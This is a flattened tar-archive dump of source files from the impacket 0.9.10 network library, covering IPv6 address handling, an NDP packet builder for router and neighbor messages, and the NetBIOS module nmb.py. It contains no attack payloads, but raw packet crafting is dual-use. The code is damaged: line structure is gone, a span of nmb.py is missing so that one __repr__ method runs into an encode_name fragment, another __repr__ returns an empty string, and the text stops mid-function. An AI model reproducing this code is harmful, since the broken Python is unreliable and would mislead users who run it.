def set_source_address(self, source_address): address = IP6_Address(source_address) bytes = self.get_bytes() bytes[8:24] = address.as_bytes() self.set_bytes(bytes) def set_destination_address(self, destination_address): address = IP6_Address(destination_address) bytes = self.get_bytes() bytes[24:40] = address.as_bytes() self.set_bytes(bytes) impacket-0.9.10/impacket/IP6_Address.py0000600000076500000240000002612712141750575017673 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: IP6_Address.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # import array class IP6_Address(): ADDRESS_BYTE_SIZE = 16 #A Hex Group is a 16-bit unit of the address TOTAL_HEX_GROUPS = 8 HEX_GROUP_SIZE = 4 #Size in characters TOTAL_SEPARATORS = TOTAL_HEX_GROUPS - 1 ADDRESS_TEXT_SIZE = (TOTAL_HEX_GROUPS * HEX_GROUP_SIZE) + TOTAL_SEPARATORS SEPARATOR = ":" SCOPE_SEPARATOR = "%" ############################################################################################################# # Constructor and construction helpers def __init__(self, address): #The internal representation of an IP6 address is a 16-byte array self.__bytes = array.array('B', '\0' * self.ADDRESS_BYTE_SIZE) self.__scope_id = "" #Invoke a constructor based on the type of the argument if type(address) is str or type(address) is unicode: self.__from_string(address) else: self.__from_bytes(address) def __from_string(self, address): #Separate the Scope ID, if present if self.__is_a_scoped_address(address): split_parts = address.split(self.SCOPE_SEPARATOR) address = split_parts[0] if (split_parts[1] == ""): raise Exception("Empty scope ID") self.__scope_id = split_parts[1] #Expand address if it's in compressed form if self.__is_address_in_compressed_form(address): address = self.__expand_compressed_address(address) #Insert leading zeroes where needed address = self.__insert_leading_zeroes(address) #Sanity check if len(address) != self.ADDRESS_TEXT_SIZE: raise Exception('IP6_Address - from_string - address size != ' + str(self.ADDRESS_TEXT_SIZE)) #Split address into hex groups hex_groups = address.split(self.SEPARATOR) if len(hex_groups) != self.TOTAL_HEX_GROUPS: raise Exception('IP6_Address - parsed hex groups != ' + str(self.TOTAL_HEX_GROUPS)) #For each hex group, convert it into integer words offset = 0 for group in hex_groups: if len(group) != self.HEX_GROUP_SIZE: raise Exception('IP6_Address - parsed hex group length != ' + str(self.HEX_GROUP_SIZE)) group_as_int = int(group, 16) self.__bytes[offset] = (group_as_int & 0xFF00) >> 8 self.__bytes[offset + 1] = (group_as_int & 0x00FF) offset += 2 def __from_bytes(self, bytes): if len(bytes) != self.ADDRESS_BYTE_SIZE: raise Exception ("IP6_Address - from_bytes - array size != " + str(self.ADDRESS_BYTE_SIZE)) self.__bytes = bytes ############################################################################################################# # Projectors def as_string(self, compress_address = True, scoped_address = True): s = "" for i, v in enumerate(self.__bytes): s += hex(v)[2:].rjust(2, '0') if (i % 2 == 1): s += self.SEPARATOR s = s[:-1].upper() if (compress_address): s = self.__trim_leading_zeroes(s) s = self.__trim_longest_zero_chain(s) if (scoped_address and self.get_scope_id() != ""): s += self.SCOPE_SEPARATOR + self.__scope_id return s def as_bytes(self): return self.__bytes def __str__(self): return self.as_string() def get_scope_id(self): return self.__scope_id def get_unscoped_address(self): return self.as_string(True, False) #Compressed address = True, Scoped address = False ############################################################################################################# # Semantic helpers def is_multicast(self): return self.__bytes[0] == 0xFF def is_unicast(self): return self.__bytes[0] == 0xFE def is_link_local_unicast(self): return self.is_unicast() and (self.__bytes[1] & 0xC0 == 0x80) def is_site_local_unicast(self): return self.is_unicast() and (self.__bytes[1] & 0xC0 == 0xC0) def is_unique_local_unicast(self): return (self.__bytes[0] == 0xFD) def get_human_readable_address_type(self): if (self.is_multicast()): return "multicast" elif (self.is_unicast()): if (self.is_link_local_unicast()): return "link-local unicast" elif (self.is_site_local_unicast()): return "site-local unicast" else: return "unicast" elif (self.is_unique_local_unicast()): return "unique-local unicast" else: return "unknown type" ############################################################################################################# #Expansion helpers #Predicate - returns whether an address is in compressed form def __is_address_in_compressed_form(self, address): #Sanity check - triple colon detection (not detected by searches of double colon) if address.count(self.SEPARATOR * 3) > 0: raise Exception('IP6_Address - found triple colon') #Count the double colon marker compression_marker_count = self.__count_compression_marker(address) if compression_marker_count == 0: return False elif compression_marker_count == 1: return True else: raise Exception('IP6_Address - more than one compression marker (\"::\") found') #Returns how many hex groups are present, in a compressed address def __count_compressed_groups(self, address): trimmed_address = address.replace(self.SEPARATOR * 2, self.SEPARATOR) #Replace "::" with ":" return trimmed_address.count(self.SEPARATOR) + 1 #Counts how many compression markers are present def __count_compression_marker(self, address): return address.count(self.SEPARATOR * 2) #Count occurrences of "::" #Inserts leading zeroes in every hex group def __insert_leading_zeroes(self, address): hex_groups = address.split(self.SEPARATOR) new_address = "" for hex_group in hex_groups: if len(hex_group) < 4: hex_group = hex_group.rjust(4, "0") new_address += hex_group + self.SEPARATOR return new_address[:-1] #Trim the last colon #Expands a compressed address def __expand_compressed_address(self, address): group_count = self.__count_compressed_groups(address) groups_to_insert = self.TOTAL_HEX_GROUPS - group_count pos = address.find(self.SEPARATOR * 2) + 1 while (groups_to_insert): address = address[:pos] + "0000" + self.SEPARATOR + address[pos:] pos += 5 groups_to_insert -= 1 #Replace the compression marker with a single colon address = address.replace(self.SEPARATOR * 2, self.SEPARATOR) return address ############################################################################################################# #Compression helpers def __trim_longest_zero_chain(self, address): chain_size = 8 while (chain_size > 0): groups = address.split(self.SEPARATOR) start_index = -1 end_index = -1 for index, group in enumerate(groups): #Find the first zero if (group == "0"): start_index = index end_index = index #Find the end of this chain of zeroes while (end_index < 7 and groups[end_index + 1] == "0"): end_index += 1 #If the zero chain matches the current size, trim it found_size = end_index - start_index + 1 if (found_size == chain_size): address = self.SEPARATOR.join(groups[0:start_index]) + self.SEPARATOR * 2 + self.SEPARATOR.join(groups[(end_index+1):]) return address #No chain of this size found, try with a lower size chain_size -= 1 return address #Trims all leading zeroes from every hex group def __trim_leading_zeroes(self, str): groups = str.split(self.SEPARATOR) str = "" for group in groups: group = group.lstrip("0") + self.SEPARATOR if (group == self.SEPARATOR): group = "0" + self.SEPARATOR str += group return str[:-1] ############################################################################################################# @classmethod def is_a_valid_text_representation(cls, text_representation): try: #Capitalize on the constructor's ability to detect invalid text representations of an IP6 address ip6_address = IP6_Address(text_representation) return True except Exception, e: return False def __is_a_scoped_address(self, text_representation): return text_representation.count(self.SCOPE_SEPARATOR) == 1 ############################################################################################################# # Informal tests if __name__ == '__main__': print IP6_Address("A:B:C:D:E:F:1:2").as_string() # print IP6_Address("A:B:C:D:E:F:0:2").as_bytes() print IP6_Address("A:B:0:D:E:F:0:2").as_string() # print IP6_Address("A::BC:E:D").as_string(False) print IP6_Address("A::BC:E:D").as_string() print IP6_Address("A::BCD:EFFF:D").as_string() print IP6_Address("FE80:0000:0000:0000:020C:29FF:FE26:E251").as_string() # print IP6_Address("A::BCD:EFFF:D").as_bytes() print IP6_Address("::").as_string() print IP6_Address("1::").as_string() print IP6_Address("::2").as_string() # bin = [ # 0x01, 0x02, 0x03, 0x04, # 0x01, 0x02, 0x03, 0x04, # 0x01, 0x02, 0x03, 0x04, # 0x01, 0x02, 0x03, 0x04] # a = IP6_Address(bin) # print a.as_string() # print a # Malformed addresses # print IP6_Address("ABCD:EFAB:1234:1234:1234:1234:1234:12345").as_string() # print IP6_Address(":::").as_string() # print IP6_Address("::::").as_string() impacket-0.9.10/impacket/NDP.py0000600000076500000240000001514412141750575016246 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: NDP.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # from ImpactPacket import Header from impacket import ImpactPacket from IP6 import IP6 from ICMP6 import ICMP6 import array, struct class NDP(ICMP6): #ICMP message type numbers ROUTER_SOLICITATION = 133 ROUTER_ADVERTISEMENT = 134 NEIGHBOR_SOLICITATION = 135 NEIGHBOR_ADVERTISEMENT = 136 REDIRECT = 137 ############################################################################ # Append NDP Option helper def append_ndp_option(self, ndp_option): #As NDP inherits ICMP6, it is, in fact an ICMP6 "header" #The payload (where all NDP options should reside) is a child of the header self.child().get_bytes().extend(ndp_option.get_bytes()) ############################################################################ @classmethod def Router_Solicitation(class_object): message_data = struct.pack('>L', 0) #Reserved bytes return class_object.__build_message(NDP.ROUTER_SOLICITATION, message_data) @classmethod def Router_Advertisement(class_object, current_hop_limit, managed_flag, other_flag, router_lifetime, reachable_time, retransmission_timer): flag_byte = 0x00 if (managed_flag): flag_byte |= 0x80 if (other_flag): flag_byte |= 0x40 message_data = struct.pack('>BBHLL', current_hop_limit, flag_byte, router_lifetime, reachable_time, retransmission_timer) return class_object.__build_message(NDP.ROUTER_ADVERTISEMENT, message_data) @classmethod def Neighbor_Solicitation(class_object, target_address): message_data = struct.pack('>L', 0) #Reserved bytes message_data += target_address.as_bytes().tostring() return class_object.__build_message(NDP.NEIGHBOR_SOLICITATION, message_data) @classmethod def Neighbor_Advertisement(class_object, router_flag, solicited_flag, override_flag, target_address): flag_byte = 0x00 if (router_flag): flag_byte |= 0x80 if (solicited_flag): flag_byte |= 0x40 if (override_flag): flag_byte |= 0x20 message_data = struct.pack('>BBBB', flag_byte, 0x00, 0x00, 0x00) #Flag byte and three reserved bytes message_data += target_address.as_bytes().tostring() return class_object.__build_message(NDP.NEIGHBOR_ADVERTISEMENT, message_data) @classmethod def Redirect(class_object, target_address, destination_address): message_data = struct.pack('>L', 0)# Reserved bytes message_data += target_address.as_bytes().tostring() message_data += destination_address.as_bytes().tostring() return class_object.__build_message(NDP.REDIRECT, message_data) @classmethod def __build_message(class_object, type, message_data): #Build NDP header ndp_packet = NDP() ndp_packet.set_type(type) ndp_packet.set_code(0) #Pack payload ndp_payload = ImpactPacket.Data() ndp_payload.set_data(message_data) ndp_packet.contains(ndp_payload) return ndp_packet class NDP_Option(): #NDP Option Type numbers SOURCE_LINK_LAYER_ADDRESS = 1 TARGET_LINK_LAYER_ADDRESS = 2 PREFIX_INFORMATION = 3 REDIRECTED_HEADER = 4 MTU_OPTION = 5 ############################################################################ @classmethod #link_layer_address must have a size that is a multiple of 8 octets def Source_Link_Layer_Address(class_object, link_layer_address): return class_object.__Link_Layer_Address(NDP_Option.SOURCE_LINK_LAYER_ADDRESS, link_layer_address) @classmethod #link_layer_address must have a size that is a multiple of 8 octets def Target_Link_Layer_Address(class_object, link_layer_address): return class_object.__Link_Layer_Address(NDP_Option.TARGET_LINK_LAYER_ADDRESS, link_layer_address) @classmethod #link_layer_address must have a size that is a multiple of 8 octets def __Link_Layer_Address(class_object, option_type, link_layer_address): option_length = (len(link_layer_address) / 8) + 1 option_data = array.array("B", link_layer_address).tostring() return class_object.__build_option(option_type, option_length, option_data) @classmethod #Note: if we upgraded to Python 2.6, we could use collections.namedtuples for encapsulating the arguments #ENHANCEMENT - Prefix could be an instance of IP6_Address def Prefix_Information(class_object, prefix_length, on_link_flag, autonomous_flag, valid_lifetime, preferred_lifetime, prefix): flag_byte = 0x00 if (on_link_flag): flag_byte |= 0x80 if (autonomous_flag): flag_byte |= 0x40 option_data = struct.pack('>BBLL', prefix_length, flag_byte, valid_lifetime, preferred_lifetime) option_data += struct.pack('>L', 0) #Reserved bytes option_data += array.array("B", prefix).tostring() option_length = 4 return class_object.__build_option(NDP_Option.PREFIX_INFORMATION, option_length, option_data) @classmethod def Redirected_Header(class_object, original_packet): option_data = struct.pack('>BBBBBB', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)# Reserved bytes option_data += array.array("B", original_packet).tostring() option_length = (len(option_data) + 4) / 8 return class_object.__build_option(NDP_Option.REDIRECTED_HEADER, option_length, option_data) @classmethod def MTU(class_object, mtu): option_data = struct.pack('>BB', 0x00, 0x00)# Reserved bytes option_data += struct.pack('>L', mtu) option_length = 1 return class_object.__build_option(NDP_Option.MTU_OPTION, option_length, option_data) @classmethod def __build_option(class_object, type, length, option_data): #Pack data data_bytes = struct.pack('>BB', type, length) data_bytes += option_data ndp_option = ImpactPacket.Data() ndp_option.set_data(data_bytes) return ndp_option impacket-0.9.10/impacket/nmb.py0000600000076500000240000010504112141750575016375 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: nmb.py 653 2012-08-13 18:44:04Z bethus@gmail.com $ # # -*- mode: python; tab-width: 4 -*- # # Copyright (C) 2001 Michael Teo # nmb.py - NetBIOS library # # This software is provided 'as-is', without any express or implied warranty. # In no event will the author be held liable for any damages arising from the # use of this software. # # Permission is granted to anyone to use this software for any purpose, # including commercial applications, and to alter it and redistribute it # freely, subject to the following restrictions: # # 1. The origin of this software must not be misrepresented; you must not # claim that you wrote the original software. If you use this software # in a product, an acknowledgment in the product documentation would be # appreciated but is not required. # # 2. Altered source versions must be plainly marked as such, and must not be # misrepresented as being the original software. # # 3. This notice cannot be removed or altered from any source distribution. # # Altered source done by Alberto Solino import socket, string, re, select, errno from structure import Structure from random import randint from struct import * import time CVS_REVISION = '$Revision: 526 $' # Taken from socket module reference INADDR_ANY = '0.0.0.0' BROADCAST_ADDR = '' # Default port for NetBIOS name service NETBIOS_NS_PORT = 137 # Default port for NetBIOS session service NETBIOS_SESSION_PORT = 139 # Default port for SMB session service SMB_SESSION_PORT = 445 # Owner Node Type Constants NODE_B = 0x0000 NODE_P = 0x2000 NODE_M = 0x4000 NODE_RESERVED = 0x6000 NODE_GROUP = 0x8000 NODE_UNIQUE = 0x0 # Name Type Constants TYPE_UNKNOWN = 0x01 TYPE_WORKSTATION = 0x00 TYPE_CLIENT = 0x03 TYPE_SERVER = 0x20 TYPE_DOMAIN_MASTER = 0x1B TYPE_DOMAIN_CONTROLLER = 0x1C TYPE_MASTER_BROWSER = 0x1D TYPE_BROWSER = 0x1E TYPE_NETDDE = 0x1F TYPE_STATUS = 0x21 # Opcodes values OPCODE_QUERY = 0 OPCODE_REGISTRATION = 0x5 OPCODE_RELEASE = 0x6 OPCODE_WACK = 0x7 OPCODE_REFRESH = 0x8 OPCODE_REQUEST = 0 OPCODE_RESPONSE = 0x10 # NM_FLAGS NM_FLAGS_BROADCAST = 0x1 NM_FLAGS_UNICAST = 0 NM_FLAGS_RA = 0x8 NM_FLAGS_RD = 0x10 NM_FLAGS_TC = 0x20 NM_FLAGS_AA = 0x40 # QUESTION_TYPE QUESTION_TYPE_NB = 0x20 # NetBIOS general Name Service Resource Record QUESTION_TYPE_NBSTAT = 0x21 # NetBIOS NODE STATUS Resource Record # QUESTION_CLASS QUESTION_CLASS_IN = 0x1 # Internet class # RR_TYPE Resource Record Type code RR_TYPE_A = 0x1 # IP address Resource Record RR_TYPE_NS = 0x2 # Name Server Resource Record RR_TYPE_NULL = 0xA # NULL Resource Record RR_TYPE_NB = 0x20 # NetBIOS general Name Service Resource Record RR_TYPE_NBSTAT = 0x21 # NetBIOS NODE STATUS Resource Record # Resource Record Class RR_CLASS_IN = 1 # Internet class # RCODE values RCODE_FMT_ERR = 0x1 # Format Error. Request was invalidly formatted. RCODE_SRV_ERR = 0x2 # Server failure. Problem with NBNS, cannot process name. RCODE_IMP_ERR = 0x4 # Unsupported request error. Allowable only for challenging NBNS when gets an Update type # registration request. RCODE_RFS_ERR = 0x5 # Refused error. For policy reasons server will not register this name from this host. RCODE_ACT_ERR = 0x6 # Active error. Name is owned by another node. RCODE_CFT_ERR = 0x7 # Name in conflict error. A UNIQUE name is owned by more than one node. # NAME_FLAGS NAME_FLAGS_PRM = 0x0200 # Permanent Name Flag. If one (1) then entry is for the permanent node name. Flag is zero # (0) for all other names. NAME_FLAGS_ACT = 0x0400 # Active Name Flag. All entries have this flag set to one (1). NAME_FLAG_CNF = 0x0800 # Conflict Flag. If one (1) then name on this node is in conflict. NAME_FLAG_DRG = 0x1000 # Deregister Flag. If one (1) then this name is in the process of being deleted. NAME_TYPES = { TYPE_UNKNOWN: 'Unknown', TYPE_WORKSTATION: 'Workstation', TYPE_CLIENT: 'Client', TYPE_SERVER: 'Server', TYPE_MASTER_BROWSER: 'Master Browser', TYPE_BROWSER: 'Browser Server', TYPE_DOMAIN_MASTER: 'Domain Master' , TYPE_NETDDE: 'NetDDE Server'} # NetBIOS Session Types NETBIOS_SESSION_MESSAGE = 0x0 NETBIOS_SESSION_REQUEST = 0x81 NETBIOS_SESSION_POSITIVE_RESPONSE = 0x82 NETBIOS_SESSION_NEGATIVE_RESPONSE = 0x83 NETBIOS_SESSION_RETARGET_RESPONSE = 0x84 NETBIOS_SESSION_KEEP_ALIVE = 0x85 def strerror(errclass, errcode): if errclass == ERRCLASS_OS: return 'OS Error', str(errcode) elif errclass == ERRCLASS_QUERY: return 'Query Error', QUERY_ERRORS.get(errcode, 'Unknown error') elif errclass == ERRCLASS_SESSION: return 'Session Error', SESSION_ERRORS.get(errcode, 'Unknown error') else: return 'Unknown Error Class', 'Unknown Error' class NetBIOSError(Exception): pass class NetBIOSTimeout(Exception): def __init__(self, message = 'The NETBIOS connection with the remote host timed out.'): Exception.__init__(self, message) class NBResourceRecord: def __init__(self, data = 0): self._data = data try: if self._data: self.rr_name = (re.split('\x00',data))[0] offset = len(self.rr_name)+1 self.rr_type = unpack('>H', self._data[offset:offset+2])[0] self.rr_class = unpack('>H', self._data[offset+2: offset+4])[0] self.ttl = unpack('>L',self._data[offset+4:offset+8])[0] self.rdlength = unpack('>H', self._data[offset+8:offset+10])[0] self.rdata = data[offset+10:self.rdlength] offset = self.rdlength - 2 self.unit_id = data[offset:offset+6] else: self.rr_name = '' self.rr_type = 0 self.rr_class = 0 self.ttl = 0 self.rdlength = 0 self.rdata = '' self.unit_id = '' except Exception,e: raise NetBIOSError( 'Wrong packet format ' ) def set_rr_name(self, name): self.rr_name = name def set_rr_type(self, name): self.rr_type = name def set_rr_class(self,cl): self_rr_class = cl def set_ttl(self,ttl): self.ttl = ttl def set_rdata(self,rdata): self.rdata = rdata self.rdlength = len(rdata) def get_unit_id(self): return self.unit_id def get_rr_name(self): return self.rr_name def get_rr_class(self): return self.rr_class def get_ttl(self): return self.ttl def get_rdlength(self): return self.rdlength def get_rdata(self): return self.rdata def rawData(self): return self.rr_name + pack('!HHLH',self.rr_type, self.rr_class, self.ttl, self.rdlength) + self.rdata class NBNodeStatusResponse(NBResourceRecord): def __init__(self, data = 0): NBResourceRecord.__init__(self,data) self.num_names = 0 self.node_names = [ ] self.statstics = '' self.mac = '00-00-00-00-00-00' try: if data: self._data = self.get_rdata() self.num_names = unpack('>B',self._data[:1])[0] offset = 1 for i in range(0, self.num_names): name = self._data[offset:offset + 15] type,flags = unpack('>BH', self._data[offset + 15: offset + 18]) offset += 18 self.node_names.append(NBNodeEntry(name, type ,flags)) self.set_mac_in_hexa(self.get_unit_id()) except Exception,e: raise NetBIOSError( 'Wrong packet format ' ) def set_mac_in_hexa(self, data): data_aux = '' for d in data: if data_aux == '': data_aux = '%02x' % ord(d) else: data_aux += '-%02x' % ord(d) self.mac = string.upper(data_aux) def get_num_names(self): return self.num_names def get_mac(self): return self.mac def set_num_names(self, num): self.num_names = num def get_node_names(self): return self.node_names def add_node_name(self,node_names): self.node_names.append(node_names) self.num_names += 1 def rawData(self): res = pack('!B', self.num_names ) for i in range(0, self.num_names): res += self.node_names[i].rawData() class NBPositiveNameQueryResponse(NBResourceRecord): def __init__(self,data = 0): NBResourceRecord.__init__(self,data) self.add_entries = [ ] if data: self._data = self.get_rdata() class NetBIOSPacket: """ This is a packet as defined in RFC 1002 """ def __init__(self, data = 0): self.name_trn_id = 0x0 # Transaction ID for Name Service Transaction. # Requestor places a unique value for each active # transaction. Responder puts NAME_TRN_ID value # from request packet in response packet. self.opcode = 0 # Packet type code self.nm_flags = 0 # Flags for operation self.rcode = 0 # Result codes of request. self.qdcount = 0 # Unsigned 16 bit integer specifying the number of entries in the question section of a Name self.ancount = 0 # Unsigned 16 bit integer specifying the number of # resource records in the answer section of a Name # Service packet. self.nscount = 0 # Unsigned 16 bit integer specifying the number of # resource records in the authority section of a # Name Service packet. self.arcount = 0 # Unsigned 16 bit integer specifying the number of # resource records in the additional records # section of a Name Service packeT. self.questions = '' self.answers = '' if data == 0: self._data = '' else: try: self._data = data self.opcode = ord(data[2]) >> 3 self.nm_flags = ((ord(data[2]) & 0x3) << 4) | ((ord(data[3]) & 0xf0) >> 4) self.name_trn_id = unpack('>H', self._data[:2])[0] self.rcode = ord(data[3]) & 0x0f self.qdcount = unpack('>H', self._data[4:6])[0] self.ancount = unpack('>H', self._data[6:8])[0] self.nscount = unpack('>H', self._data[8:10])[0] self.arcount = unpack('>H', self._data[10:12])[0] self.answers = self._data[12:] except Exception,e: raise NetBIOSError( 'Wrong packet format ' ) def set_opcode(self, opcode): self.opcode = opcode def set_trn_id(self, trn): self.name_trn_id = trn def set_nm_flags(self, nm_flags): self.nm_flags = nm_flags def set_rcode(self, rcode): self.rcode = rcode def addQuestion(self, question, qtype, qclass): self.qdcount = self.qdcount + 1 self.questions += question + pack('!HH',qtype,qclass) def get_trn_id(self): return self.name_trn_id def get_rcode(self): return self.rcode def get_nm_flags(self): return self.name_trn_id def get_opcode(self): return self.opcode def get_qdcount(self): return self.qdcount def get_ancount(self): return self.ancount def get_nscount(self): return self.nscount def get_arcount(self): return self.arcount def rawData(self): secondWord = self.opcode << 11 secondWord = secondWord | (self.nm_flags << 4) secondWord = secondWord | self.rcode data = pack('!HHHHHH', self.name_trn_id, secondWord , self.qdcount, self.ancount, self.nscount, self.arcount) + self.questions + self.answers return data def get_answers(self): return self.answers class NBHostEntry: def __init__(self, nbname, nametype, ip): self.__nbname = nbname self.__nametype = nametype self.__ip = ip def get_nbname(self): return self.__nbname def get_nametype(self): return self.__nametype def get_ip(self): return self.__ip def __repr__(self): return '' class NBNodeEntry: def __init__(self, nbname, nametype, flags): self.__nbname = string.ljust(nbname,17) self.__nametype = nametype self.__flags = flags self.__isgroup = flags & 0x8000 self.__nodetype = flags & 0x6000 self.__deleting = flags & 0x1000 self.__isconflict = flags & 0x0800 self.__isactive = flags & 0x0400 self.__ispermanent = flags & 0x0200 def get_nbname(self): return self.__nbname def get_nametype(self): return self.__nametype def is_group(self): return self.__isgroup def get_nodetype(self): return self.__nodetype def is_deleting(self): return self.__deleting def is_conflict(self): return self.__isconflict def is_active(self): return self.__isactive def is_permanent(self): return self.__ispermanent def set_nbname(self, name): self.__nbname = string.ljust(name,17) def set_nametype(self, type): self.__nametype = type def set_flags(self,flags): self.__flags = flags def __repr__(self): s = ' 15: name = name[:15] + chr(type) else: name = string.ljust(name, 15) + chr(type) encoded_name = chr(len(name) * 2) + re.sub('.', _do_first_level_encoding, name) if scope: encoded_scope = '' for s in string.split(scope, '.'): encoded_scope = encoded_scope + chr(len(s)) + s return encoded_name + encoded_scope + '\0' else: return encoded_name + '\0' # Internal method for use in encode_name() def _do_first_level_encoding(m): s = ord(m.group(0)) return string.uppercase[s >> 4] + string.uppercase[s & 0x0f] def decode_name(name): name_length = ord(name[0]) assert name_length == 32 decoded_name = re.sub('..', _do_first_level_decoding, name[1:33]) if name[33] == '\0': return 34, decoded_name, '' else: decoded_domain = '' offset = 34 while 1: domain_length = ord(name[offset]) if domain_length == 0: break decoded_domain = '.' + name[offset:offset + domain_length] offset = offset + domain_length return offset + 1, decoded_name, decoded_domain def _do_first_level_decoding(m): s = m.group(0) return chr(((ord(s[0]) - ord('A')) << 4) | (ord(s[1]) - ord('A'))) class NetBIOSSessionPacket: def __init__(self, data = 0): self.type = 0x0 self.flags = 0x0 self.length = 0x0 if data == 0: self._trailer = '' else: try: self.type = ord(data[0]) if self.type == NETBIOS_SESSION_MESSAGE: self.length = ord(data[1]) << 16 | (unpack('!H', data[2:4])[0]) else: self.flags = ord(data[1]) self.length = unpack('!H', data[2:4])[0] self._trailer = data[4:] except: raise NetBIOSError( 'Wrong packet format ' ) def set_type(self, type): self.type = type def get_type(self): return self.type def rawData(self): if self.type == NETBIOS_SESSION_MESSAGE: data = pack('!BBH',self.type,self.length >> 16,self.length & 0xFFFF) + self._trailer else: data = pack('!BBH',self.type,self.flags,self.length) + self._trailer return data def set_trailer(self,data): self._trailer = data self.length = len(data) def get_length(self): return self.length def get_trailer(self): return self._trailer class NetBIOSSession: def __init__(self, myname, remote_name, remote_host, remote_type = TYPE_SERVER, sess_port = NETBIOS_SESSION_PORT, timeout = None, local_type = TYPE_WORKSTATION, sock = None): if len(myname) > 15: self.__myname = string.upper(myname[:15]) else: self.__myname = string.upper(myname) self.__local_type = local_type assert remote_name # if destination port SMB_SESSION_PORT and remote name *SMBSERVER, we're changing it to its IP address # helping solving the client mistake ;) if remote_name == '*SMBSERVER' and sess_port == SMB_SESSION_PORT: remote_name = remote_host # If remote name is *SMBSERVER let's try to query its name.. if can't be guessed, continue and hope for the best if remote_name == '*SMBSERVER': nb = NetBIOS() try: res = nb.getnetbiosname(remote_host) except: res = None pass if res is not None: remote_name = res if len(remote_name) > 15: self.__remote_name = string.upper(remote_name[:15]) else: self.__remote_name = string.upper(remote_name) self.__remote_type = remote_type self.__remote_host = remote_host if sock is not None: # We are acting as a server self._sock = sock else: self._sock = self._setup_connection((remote_host, sess_port)) if sess_port == NETBIOS_SESSION_PORT: self._request_session(remote_type, local_type, timeout) def get_myname(self): return self.__myname def get_mytype(self): return self.__local_type def get_remote_host(self): return self.__remote_host def get_remote_name(self): return self.__remote_name def get_remote_type(self): return self.__remote_type def close(self): self._sock.close() def get_socket(self): return self._sock class NetBIOSUDPSessionPacket(Structure): TYPE_DIRECT_UNIQUE = 16 TYPE_DIRECT_GROUP = 17 FLAGS_MORE_FRAGMENTS = 1 FLAGS_FIRST_FRAGMENT = 2 FLAGS_B_NODE = 0 structure = ( ('Type','B=16'), # Direct Unique Datagram ('Flags','B=2'), # FLAGS_FIRST_FRAGMENT ('ID','L'), ('SourceIP','"'), ('SourcePort','>H=138'), ('DataLegth','>H-Data'), ('Offset','>H=0'), ('SourceName','z'), ('DestinationName','z'), ('Data',':'), ) def getData(self): addr = self['SourceIP'].split('.') addr = [int(x) for x in addr] addr = (((addr[0] << 8) + addr[1] << 8) + addr[2] << 8) + addr[3] self['_SourceIP'] = addr return Structure.getData(self) def get_trailer(self): return self['Data'] class NetBIOSUDPSession(NetBIOSSession): def _setup_connection(self, peer): af, socktype, proto, canonname, sa = socket.getaddrinfo(peer[0], peer[1], 0, socket.SOCK_DGRAM)[0] sock = socket.socket(af, socktype, proto) sock.connect(sa) sock = socket.socket(af, socktype, proto) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((INADDR_ANY, 138)) self.peer = peer return sock def _request_session(self, remote_type, local_type, timeout = None): pass def next_id(self): if hasattr(self, '__dgram_id'): answer = self.__dgram_id else: self.__dgram_id = randint(1,65535) answer = self.__dgram_id self.__dgram_id += 1 return answer def send_packet(self, data): # Yes... I know... self._sock.connect(self.peer) p = NetBIOSUDPSessionPacket() p['ID'] = self.next_id() p['SourceIP'] = self._sock.getsockname()[0] p['SourceName'] = encode_name(self.get_myname(), self.get_mytype(), '')[:-1] p['DestinationName'] = encode_name(self.get_remote_name(), self.get_remote_type(), '')[:-1] p['Data'] = data self._sock.sendto(str(p), self.peer) self._sock.close() self._sock = self._setup_connection(self.peer) def recv_packet(self, timeout = None): # The next loop is a workaround for a bigger problem: # When data reaches higher layers, the lower headers are lost, # and with them, for example, the source IP. Hence, SMB users # can't know where packets are comming from... we need a better # solution, right now, we will filter everything except packets # coming from the remote_host specified in __init__() while 1: data, peer = self._sock.recvfrom(8192) # print "peer: %r self.peer: %r" % (peer, self.peer) if peer == self.peer: break return NetBIOSUDPSessionPacket(data) class NetBIOSTCPSession(NetBIOSSession): def __init__(self, myname, remote_name, remote_host, remote_type = TYPE_SERVER, sess_port = NETBIOS_SESSION_PORT, timeout = None, local_type = TYPE_WORKSTATION, sock = None, select_poll = False): self.__select_poll = select_poll if (self.__select_poll): self.read_function = self.polling_read else: self.read_function = self.non_polling_read NetBIOSSession.__init__(self, myname, remote_name, remote_host, remote_type = remote_type, sess_port = sess_port, timeout = timeout, local_type = local_type, sock=sock) def _setup_connection(self, peer): af, socktype, proto, canonname, sa = socket.getaddrinfo(peer[0], peer[1], 0, socket.SOCK_STREAM)[0] sock = socket.socket(af, socktype, proto) sock.connect(sa) return sock def send_packet(self, data): p = NetBIOSSessionPacket() p.set_type(NETBIOS_SESSION_MESSAGE) p.set_trailer(data) self._sock.send(p.rawData()) def recv_packet(self, timeout = None): data = self.__read(timeout) return NetBIOSSessionPacket(data) def _request_session(self, remote_type, local_type, timeout = None): p = NetBIOSSessionPacket() remote_name = encode_name(self.get_remote_name(), remote_type, '') myname = encode_name(self.get_myname(), local_type, '') p.set_type(NETBIOS_SESSION_REQUEST) p.set_trailer(remote_name + myname) self._sock.send(p.rawData()) while 1: p = self.recv_packet(timeout) if p.get_type() == NETBIOS_SESSION_NEGATIVE_RESPONSE: raise NetBIOSError, ( 'Cannot request session', ERRCLASS_SESSION, ord(p.get_trailer()[0]) ) elif p.get_type() == NETBIOS_SESSION_POSITIVE_RESPONSE: break else: # Ignore all other messages, most probably keepalive messages pass def polling_read(self, read_length, timeout): data = '' if (timeout is None): timeout = 3600 time_left = timeout CHUNK_TIME = 0.025 bytes_left = read_length while bytes_left > 0: try: ready, _, _ = select.select([self._sock.fileno() ], [ ], [ ], 0) if not ready: if time_left == 0: raise NetBIOSTimeout else: time.sleep(CHUNK_TIME) time_left = time_left - CHUNK_TIME continue received = self._sock.recv(bytes_left) if len(received) == 0: raise NetBIOSError, ( 'Error while reading from remote', ERRCLASS_OS, None) data = data + received bytes_left = read_length - len(data) except select.error, ex: if ex[0] != errno.EINTR and ex[0] != errno.EAGAIN: 